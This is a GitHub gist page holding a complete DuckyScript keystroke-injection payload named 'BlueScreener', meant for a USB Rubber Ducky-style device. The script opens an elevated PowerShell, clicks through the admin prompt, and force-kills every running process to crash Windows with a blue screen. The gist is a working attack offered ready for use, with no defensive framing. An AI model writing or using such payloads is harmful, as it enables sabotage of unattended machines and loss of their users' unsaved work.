Skip to content

Instantly share code, notes, and snippets.

@JonnyBanana
Created April 17, 2018 03:10
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save JonnyBanana/a9a8fba2b6cf10630793580c4f169745 to your computer and use it in GitHub Desktop.
Save JonnyBanana/a9a8fba2b6cf10630793580c4f169745 to your computer and use it in GitHub Desktop.
REM Title: BlueScreener
REM Note: Cheap and easy way to force a kernel panic (BSoD) in Windows
DELAY 4000
CONTROL ESCAPE
DELAY 200
STRING powershell
CTRL-SHIFT ENTER
DELAY 1500
ALT y
DELAY 600
STRING get-process | stop-process -force
DELAY 200
ENTER
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment